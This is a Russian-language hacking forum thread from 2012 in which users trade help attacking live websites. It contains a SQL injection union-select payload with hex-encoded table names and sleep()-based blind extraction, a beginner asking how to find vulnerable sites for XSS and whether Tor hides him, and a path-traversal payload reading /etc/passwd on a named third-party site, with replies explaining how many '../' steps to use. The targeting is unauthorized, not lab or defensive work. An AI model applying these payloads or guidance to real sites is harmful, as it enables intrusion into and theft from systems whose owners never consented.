08.01.2012, 17:38
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 35
С нами:
10409033
Репутация:
3
|
|
Сообщение от stepashka_
Может быть abc_user просто в другой базе?
Проверь.
union+select+1,2,table_schema+from+information_sch ema.tables+where+table_name=0x6162635f75736572
самое веселое что и 0x6162635f75736572
он переводит в 0X6162635f75736572 и в итоге ничего не выходит, я вытаскивал по символу через sleep(), база и таблаца верная.
ладно. похоже тут ничего не сделать.
|
|
|
08.01.2012, 17:41
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от [R
eD"]
[R]eD said:
самое веселое что и 0x6162635f75736572
он переводит в 0X6162635f75736572 и в итоге ничего не выходит, я вытаскивал по символу через sleep(), база и таблаца верная.
ладно. похоже тут ничего не сделать.
Блин, RED, поделись уже ссылкой.
|
|
|
|
08.01.2012, 18:52
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
С нами:
8625634
Репутация:
0
|
|
Сообщение от M_script
Это не имена файлов
А что это?
|
|
|
|
08.01.2012, 22:57
|
|
Новичок
Регистрация: 31.12.2011
Сообщений: 25
С нами:
7561046
Репутация:
0
|
|
Я уже дофига статей прочитал и просмотрел видео по xss и хочу попробовать на деле, только сканер xss по левому сканирует , я нашел online-scaner xss , подскажите мне пожалуйста как в гугле искать простые сайты чтобы найти в них xss , мне просто очень важно найти такой сайт а далше я уже сам разберусь. Благодарнен за любую помощь.
|
|
|
|
08.01.2012, 23:01
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
С нами:
8686406
Репутация:
265
|
|
Сообщение от NZT
Я уже дофига статей прочитал и просмотрел видео по xss и хочу попробовать на деле, только сканер xss по левому сканирует , я нашел online-scaner xss , подскажите мне пожалуйста как в гугле искать простые сайты чтобы найти в них xss , мне просто очень важно найти такой сайт а далше я уже сам разберусь. Благодарнен за любую помощь.
/thread35802.html
|
|
|
|
08.01.2012, 23:12
|
|
Новичок
Регистрация: 31.12.2011
Сообщений: 25
С нами:
7561046
Репутация:
0
|
|
stepashka_ , скажу чесно дело в том что я боюсь на популярных сайтах тренироваться чтобы потом проблем небыло , или Tor достаточно для этих сайтов?
|
|
|
|
08.01.2012, 23:50
|
|
Новичок
Регистрация: 12.05.2010
Сообщений: 2
С нами:
8421303
Репутация:
0
|
|
Вот из темы PHP иньекций я взял пример
Код:
http://bombaticket.ru/pg.php?p=../../../../../etc/passwd%00
Скажите пожалуйста, как узнать сколько подставлять ../ ? Это путь до файла на сколько я понял, но где это смотреть, в самой ошибке? Вот ошибка
Код:
Warning: include(htm/fgh.htm) [function.include]: failed to open stream: No such file or directory in /home/www/z74500/bombaticket.ru/pg.php on line 97
Объясните пож-та на данном примере что именно ../../../../../etc/passwd%00 надо подставлять. |
|
|
|
08.01.2012, 23:54
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Skipp
Вот из темы PHP иньекций я взял пример
Код:
http://bombaticket.ru/pg.php?p=../../../../../etc/passwd%00
Скажите пожалуйста, как узнать сколько подставлять
../
? Это путь до файла на сколько я понял, но где это смотреть, в самой ошибке? Вот ошибка
Код:
Warning: include(htm/fgh.htm) [function.include]: failed to open stream: No such file or directory in /home/www/z74500/bombaticket.ru/pg.php on line 97
Объясните пож-та на данном примере что именно
../../../../../etc/passwd%00
надо подставлять. ../ = директорыя выше
./ = данная директория
дир = /papka1/papka2/papka3/
чтобы выйти за пределы этих папок, надо подставить 3 пары
../../../
в твоем примере
папка = /home/www/z74500/bombaticket.ru/
то есть надо подставь 4 пары (../../../../) чтобы смогли подключить файлы начиная с корневой директории
|
|
|
|
09.01.2012, 00:11
|
|
Новичок
Регистрация: 12.05.2010
Сообщений: 2
С нами:
8421303
Репутация:
0
|
|
Сообщение от Konqi
в твоем примере
папка = /home/www/z74500/bombaticket.ru/
то есть надо подставь 4 пары (../../../../) чтобы смогли подключить файлы начиная с корневой директории
Спасибо, понятно, но в моём примере стоит 5 пар (../../../../../), или я что-то не допонял.
|
|
|
|
09.01.2012, 00:13
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами:
8265206
Репутация:
84
|
|
/ 5 home/ 4 www/ 3 z74500/ 2 bombaticket.ru/ 1 pg.php
не?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [R]eD](/avatars/avatar26157.jpg?2970639){kind=avatar}
Похожие темы
Комбинированный вид
